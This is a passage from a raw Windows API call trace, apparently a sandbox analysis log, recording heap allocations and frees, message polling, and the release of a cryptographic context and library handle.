wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0231.518] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77788 | out: hHeap=0x970000) returned 1 [0231.518] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0231.518] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78618 | out: hHeap=0x970000) returned 1 [0231.518] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e60 | out: hHeap=0x970000) returned 1 [0231.518] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0231.518] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0231.518] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0231.518] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0231.518] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f378 | out: hHeap=0x970000) returned 1 [0231.518] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f48 | out: hHeap=0x970000) returned 1 [0231.518] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0231.518] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0231.519] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f04460 | out: hHeap=0x970000) returned 1 [0231.519] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f88 | out: hHeap=0x970000) returned 1 [0231.519] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0231.519] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0231.519] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78618 | out: hHeap=0x970000) returned 1 [0231.519] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f08 | out: hHeap=0x970000) returned 1 [0231.519] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0231.519] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0231.519] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f04508 | out: hHeap=0x970000) returned 1 [0231.519] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550f8 | out: hHeap=0x970000) returned 1 [0231.519] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0231.519] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0231.519] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0231.519] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f04460 | out: hHeap=0x970000) returned 1 [0231.519] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fb8 | out: hHeap=0x970000) returned 1 [0231.519] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0231.520] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0231.520] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f698 | out: hHeap=0x970000) returned 1 [0231.520] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55038 | out: hHeap=0x970000) returned 1 [0231.520] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0231.520] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0231.520] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f38 [0231.520] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55108 [0231.520] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550c8 [0231.520] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d88 [0231.520] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f38 | out: hHeap=0x970000) returned 1 [0231.520] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55108 | out: hHeap=0x970000) returned 1 [0231.520] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d88 | out: hHeap=0x970000) returned 1 [0231.520] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550c8 | out: hHeap=0x970000) returned 1 [0231.520] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f38 [0231.520] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fb8 [0231.520] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e90 [0231.520] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f88 [0231.520] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550b8 [0231.520] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f68 [0231.520] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e90 | out: hHeap=0x970000) returned 1 [0231.520] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f88 | out: hHeap=0x970000) returned 1 [0231.521] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f68 | out: hHeap=0x970000) returned 1 [0231.521] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550b8 | out: hHeap=0x970000) returned 1 [0231.521] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f38 [0231.521] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f68 [0231.521] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f48 [0231.521] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55018 [0231.521] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d88 [0231.521] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f68 | out: hHeap=0x970000) returned 1 [0231.521] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f48 | out: hHeap=0x970000) returned 1 [0231.521] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d88 | out: hHeap=0x970000) returned 1 [0231.521] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55018 | out: hHeap=0x970000) returned 1 [0231.521] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e90 [0231.521] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55018 [0231.521] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0231.521] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69a08 [0231.521] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x2e69a08, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptReleaseContext", lpUsedDefaultChar=0x0) returned 20 [0231.521] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e90 | out: hHeap=0x970000) returned 1 [0231.521] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f530 [0231.521] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a08 | out: hHeap=0x970000) returned 1 [0231.522] GetProcAddress (hModule=0x756e0000, lpProcName="CryptReleaseContext") returned 0x756ffbc0 [0231.522] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f530 | out: hHeap=0x970000) returned 1 [0231.522] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55018 | out: hHeap=0x970000) returned 1 [0231.522] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f68 [0231.522] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f88 [0231.522] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f28 [0231.522] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f88 | out: hHeap=0x970000) returned 1 [0231.522] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f28 | out: hHeap=0x970000) returned 1 [0231.522] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f68 | out: hHeap=0x970000) returned 1 [0231.522] CryptReleaseContext (hProv=0xa5f958, dwFlags=0x0) returned 1 [0231.522] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2e56588 [0231.522] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50d88 [0231.522] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fd8 [0231.522] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e60 [0231.522] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e90 [0231.522] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f68 [0231.522] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fa8 [0231.522] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f68 | out: hHeap=0x970000) returned 1 [0231.522] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fa8 | out: hHeap=0x970000) returned 1 [0231.522] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e90 | out: hHeap=0x970000) returned 1 [0231.523] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e90 [0231.523] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f68 [0231.523] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e511f0 [0231.523] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550e8 [0231.523] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511f0 | out: hHeap=0x970000) returned 1 [0231.523] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550e8 | out: hHeap=0x970000) returned 1 [0231.523] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f68 | out: hHeap=0x970000) returned 1 [0231.523] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f68 [0231.523] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51220 [0231.523] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51190 [0231.523] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f58 [0231.523] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51190 | out: hHeap=0x970000) returned 1 [0231.523] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f58 | out: hHeap=0x970000) returned 1 [0231.523] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51220 | out: hHeap=0x970000) returned 1 [0231.523] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fb8 | out: hHeap=0x970000) returned 1 [0231.523] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f38 | out: hHeap=0x970000) returned 1 [0231.523] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f38 | out: hHeap=0x970000) returned 1 [0231.523] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f08 | out: hHeap=0x970000) returned 1 [0231.523] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55098 | out: hHeap=0x970000) returned 1 [0231.523] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d40 | out: hHeap=0x970000) returned 1 [0231.523] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e18 | out: hHeap=0x970000) returned 1 [0231.523] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d58 | out: hHeap=0x970000) returned 1 [0231.523] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ce0 | out: hHeap=0x970000) returned 1 [0231.524] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50cc8 | out: hHeap=0x970000) returned 1 [0231.524] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50dd0 | out: hHeap=0x970000) returned 1 [0231.524] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e30 | out: hHeap=0x970000) returned 1 [0231.524] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e00 | out: hHeap=0x970000) returned 1 [0231.524] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d70 | out: hHeap=0x970000) returned 1 [0231.524] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f50 | out: hHeap=0x970000) returned 1 [0231.524] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ef0 | out: hHeap=0x970000) returned 1 [0231.524] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f5f8 | out: hHeap=0x970000) returned 1 [0231.524] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e60 | out: hHeap=0x970000) returned 1 [0231.524] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e90 | out: hHeap=0x970000) returned 1 [0231.524] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f68 | out: hHeap=0x970000) returned 1 [0231.524] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d88 | out: hHeap=0x970000) returned 1 [0231.524] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fd8 | out: hHeap=0x970000) returned 1 [0231.524] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e56588 | out: hHeap=0x970000) returned 1 [0231.524] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0231.524] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50cc8 [0231.524] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d40 [0231.524] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f98 [0231.524] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2f045e8 [0231.524] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f48 [0231.524] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0231.524] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f045e8 | out: hHeap=0x970000) returned 1 [0231.525] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f48 | out: hHeap=0x970000) returned 1 [0231.525] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50d58 [0231.525] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78b28 [0231.525] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0231.525] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55088 [0231.525] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fa8 [0231.525] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fa8 | out: hHeap=0x970000) returned 1 [0231.525] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55088 | out: hHeap=0x970000) returned 1 [0231.525] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b28 | out: hHeap=0x970000) returned 1 [0231.525] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d58 | out: hHeap=0x970000) returned 1 [0231.525] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f98 | out: hHeap=0x970000) returned 1 [0231.525] FreeLibrary (hLibModule=0x756e0000) returned 1 [0231.525] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d40 | out: hHeap=0x970000) returned 1 [0231.525] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50cc8 | out: hHeap=0x970000) returned 1 [0231.525] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0231.525] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77588 | out: hHeap=0x970000) returned 1 [0231.525] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0231.525] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78a50 | out: hHeap=0x970000) returned 1 [0231.525] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ec0 | out: hHeap=0x970000) returned 1 [0231.525] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0231.525] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f58 [0231.525] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55008 [0231.525] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fe8 [0231.526] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69a28 [0231.526] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fe8 | out: hHeap=0x970000) returned 1 [0231.526] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a28 | out: hHeap=0x970000) returned 1 [0231.526] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55008 | out: hHeap=0x970000) returned 1 [0231.526] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f58 | out: hHeap=0x970000) returned 1 [0231.526] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e30 [0231.526] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50ef0 [0231.526] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50f08 [0231.526] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50f38 [0231.526] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d88 [0231.526] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50dd0 [0231.526] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f4b8 [0231.526] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e30 | out: hHeap=0x970000) returned 1 [0231.526] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50f50 [0231.526] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e00 [0231.526] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d40 [0231.526] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55068 [0231.526] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55068 | out: hHeap=0x970000) returned 1 [0231.526] CloseHandle (hObject=0x2a0) returned 1 [0231.526] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d28 | out: hHeap=0x970000) returned 1 [0231.527] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0231.527] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x3be0dd0 | out: hHeap=0x970000) returned 1 [0231.530] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77808 | out: hHeap=0x970000) returned 1 [0231.530] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b28 | out: hHeap=0x970000) returned 1 [0231.531] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d40 | out: hHeap=0x970000) returned 1 [0231.531] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e00 | out: hHeap=0x970000) returned 1 [0231.531] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ef0 | out: hHeap=0x970000) returned 1 [0231.531] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f08 | out: hHeap=0x970000) returned 1 [0231.531] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d88 | out: hHeap=0x970000) returned 1 [0231.531] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f38 | out: hHeap=0x970000) returned 1 [0231.531] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50dd0 | out: hHeap=0x970000) returned 1 [0231.531] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f50 | out: hHeap=0x970000) returned 1 [0231.531] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f4b8 | out: hHeap=0x970000) returned 1 [0231.531] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0231.531] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d18 [0231.531] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d28 [0231.531] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dc8 [0231.531] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69b68 [0231.531] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0231.531] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b68 | out: hHeap=0x970000) returned 1 [0231.531] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0231.531] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0231.531] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d88 [0231.531] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50e00 [0231.531] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50ef0 [0231.531] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50dd0 [0231.532] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d40 [0231.532] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50e60 [0231.532] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f648 [0231.532] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d88 | out: hHeap=0x970000) returned 1 [0231.532] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50ec0 [0231.532] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f38 [0231.532] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d88 [0231.532] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d18 [0231.532] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0231.532] CloseHandle (hObject=0x2d0) returned 1 [0231.535] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50fb0 | out: hHeap=0x970000) returned 1 [0231.535] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cd8 | out: hHeap=0x970000) returned 1 [0231.535] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f04810 | out: hHeap=0x970000) returned 1 [0231.537] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77888 | out: hHeap=0x970000) returned 1 [0231.537] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69888 | out: hHeap=0x970000) returned 1 [0231.537] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d88 | out: hHeap=0x970000) returned 1 [0231.537] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f38 | out: hHeap=0x970000) returned 1 [0231.537] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e00 | out: hHeap=0x970000) returned 1 [0231.537] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ef0 | out: hHeap=0x970000) returned 1 [0231.537] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d40 | out: hHeap=0x970000) returned 1 [0231.537] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50dd0 | out: hHeap=0x970000) returned 1 [0231.537] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e60 | out: hHeap=0x970000) returned 1 [0231.537] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ec0 | out: hHeap=0x970000) returned 1 [0231.537] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f648 | out: hHeap=0x970000) returned 1 [0231.537] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0231.537] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ca8 [0231.538] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ef0 [0231.538] RtlAllocateHeap 